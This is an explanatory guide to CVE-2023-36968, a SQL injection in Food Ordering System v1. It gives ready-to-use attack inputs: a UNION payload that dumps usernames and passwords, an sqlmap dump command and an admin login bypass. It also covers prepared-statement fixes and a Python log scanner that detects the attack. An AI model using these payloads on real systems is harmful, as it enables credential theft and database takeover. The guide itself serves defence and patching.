CVE-2023-36968 is a critical security hole affecting the popular open-source Food Ordering System version 1.. Discovered in 2023, it allows attackers to run any database command they wish by sneaking special SQL code into the id parameter. This vulnerability is easy to exploit – and unless you patch your application, your users' data, admin accounts, and even your server could be at risk.

This guide gives you a full run-down in plain English, with code, examples, and references to everything you need to know.

- Type: SQL Injection
- CVE-ID: CVE-2023-36968
- Component: id GET parameter
- Impact: Database read/write, authentication bypass, possible remote code execution

References:

- Exploit-DB 51537
- NVD CVE-2023-36968

How the Vulnerability Works

The Food Ordering System v1. uses PHP and MySQL. Certain pages (like view_item.php) trust user input too much. When you open a URL like this:

http://yourserver/view_item.php?id=12

The code behind it basically does something like

<?php
// BAD: No input sanitization!
$id = $_GET['id'];
$sql = "SELECT * FROM items WHERE id = $id";
$result = mysqli_query($conn, $sql);
?>

If an attacker changes the URL and enters malicious SQL, the database will blindly process it!

Example Malicious Input

http://yourserver/view_item.php?id=12 UNION SELECT 1,username,password FROM users--

It ends up running

SELECT * FROM items WHERE id = 12 UNION SELECT 1,username,password FROM users--

This lets the attacker download all usernames and passwords!

Here’s a simplified snippet of the kind of PHP code at fault

<?php
// Vulnerable because $id isn't sanitized or parameterized
$id = $_GET['id'];
$query = "SELECT * FROM items WHERE id = $id";
$result = mysqli_query($conn, $query);
while ($row = mysqli_fetch_assoc($result)) {
    echo $row['name'];
}
?>

Any user controlling id can inject their own SQL commands.

Try adding an apostrophe to the URL

http://target/view_item.php?id=1'

If you see a SQL syntax error, the site is probably vulnerable.

To dump usernames and (hashed or plain) passwords, use a classic UNION injection

http://target/view_item.php?id=1 UNION SELECT 1,username,password FROM users--

The easiest way to exploit is to use sqlmap

sqlmap -u "http://target/view_item.php?id=1" --dump

Username: admin' -- 
Password: anything

(Note the space after the two dashes; MySQL only treats -- as a comment when it is followed by whitespace.)

If the code does

SELECT * FROM users WHERE username='admin' -- ' AND password='anything'

The password part is commented out, and you get in as admin!

How to Fix

NEVER use user input directly in SQL! Use parameterized queries everywhere. For a numeric value like id, casting to an integer is the bare minimum, but a cast does nothing for string parameters such as the username in the login example above, so prepared statements are the real fix.

Simple Fix Example

// Using prepared statements (mysqli): the id is cast to an integer and then
// bound as a parameter, so user input never becomes part of the SQL text
$id = intval($_GET['id']);
$stmt = $conn->prepare("SELECT * FROM items WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

Or use PDO:

// The :id placeholder is bound at execute time, so the value is sent to
// MySQL as data rather than concatenated into the query string
$id = $_GET['id'];
$stmt = $pdo->prepare("SELECT * FROM items WHERE id = :id");
$stmt->execute(['id' => $id]);
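Written in Python as an added example for this page, not code from the advisory or from the Food Ordering System project: it applies the same strict-numeric rule on the detection side, parsing constructed Apache-style access-log lines (the IPs, timestamps and requests are made up) and flagging every view_item.php request whose id is not a bare number. The comment in is_valid_item_id explains why an allow-list check is stronger than a plain integer cast.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log sample (not real traffic); IPs and
# timestamps are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2023:14:20:01 +0000] "GET /view_item.php?id=12 HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2023:14:21:10 +0000] "GET /view_item.php?id=1%27 HTTP/1.1" 500 233
10.0.0.9 - - [06/Jul/2023:14:21:45 +0000] "GET /view_item.php?id=1%20UNION%20SELECT%201,username,password%20FROM%20users-- HTTP/1.1" 200 4096
10.0.0.7 - - [06/Jul/2023:14:22:03 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

# Common log format: ip ident user [time] "method target protocol" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Indicators of SQL tampering in a value that should have been a bare number.
SQLI_MARKERS = re.compile(r"'|\bunion\b|\bselect\b|--|/\*", re.IGNORECASE)


def is_valid_item_id(value: str) -> bool:
    """Allow-list check: one to ten ASCII digits, nothing else.
    PHP's intval('12 UNION ...') quietly returns 12, which neutralises the
    payload but hides the attempt; a strict check can reject and log it."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def scan_access_log(text: str) -> list:
    """Return one finding per view_item.php request whose id fails the check."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/view_item.php"):
            continue
        # parse_qs percent-decodes, so %27 and %20 are already ' and space here.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if is_valid_item_id(value):
                continue
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "status": int(m["status"]),
                "id": value,
                "sqli_markers": SQLI_MARKERS.search(value) is not None,
            })
    return findings
```

Running scan_access_log(SAMPLE_LOG) returns the two tampered requests from 10.0.0.9 and ignores the legitimate id=12 request and the unrelated index.php hit.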

Summary

- CVE-2023-36968 in Food Ordering System v1. lets hackers steal, change, or delete data using SQL Injection via the id parameter.

Patch your code fast by switching to parameterized queries!

Read more:
- Official NVD entry
- Exploit-DB 51537 PoC
- sqlmap tool

Stay protected. If you’re running Food Ordering System v1., update now or fix the code as shown above!

Timeline

Published on: 07/06/2023 14:15:00 UTC
Last modified on: 07/10/2023 14:05:00 UTC